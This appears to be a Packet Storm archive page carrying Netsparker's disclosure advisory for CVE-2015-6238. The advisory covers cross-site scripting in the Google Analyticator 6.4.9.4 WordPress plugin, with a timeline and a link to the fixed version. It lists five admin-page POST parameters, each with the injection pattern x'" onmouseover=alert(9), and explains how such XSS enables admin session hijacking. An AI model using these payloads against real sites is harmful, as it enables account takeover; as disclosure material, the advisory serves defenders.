exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Analyticator 6.4.9.4 Cross Site Scripting

Google Analyticator 6.4.9.4 Cross Site Scripting
Posted Aug 25, 2015
Authored by Omar Kurt | Site netsparker.com

WordPress Google Analyticator plugin version 6.4.9.4 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2015-6238
SHA-256 | 7f7523e430b3afce63313d41c2b6e4084ef335223ee61e6f6fdb35a34d45f768

Google Analyticator 6.4.9.4 Cross Site Scripting

Change Mirror Download
Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Google Analyticator
Affected Software : Google Analyticator (WordPress Plugin)
Affected Versions: 6.4.9.4 and possibly below
Vendor Homepage : https://wordpress.org/plugins/google-analyticator/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-6238
Netsparker Advisory Reference : NS-15-013

Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in user’s session. This means that the malicious hacker can change
the logged in user’s password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator’s session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details
--------------------
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4:

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_adsense
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_admin_disable_DimentionIndex
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_outbound_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline
--------------------
14/08/2015 - First Contact
24/08/2015 - Vendor Fixed
24/08/2015 - Advisory Released

Solution
--------------------
https://downloads.wordpress.org/plugin/google-analyticator.6.4.9.6.zip

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web
Application Security Scanner.

About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such as
SQL Injection and Cross-site Scripting (XSS) in all websites and web
applications regardless of the platform and the technology they are built
on. Netsparker's unique detection and exploitation techniques allows it to
be dead accurate in reporting hence it's the first and the only False
Positive Free web application security scanner. For more information visit
our website on https://www.netsparker.com

--
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner <https://www.netsparker.com>
T: +90 (0)554 873 0482
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    19 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close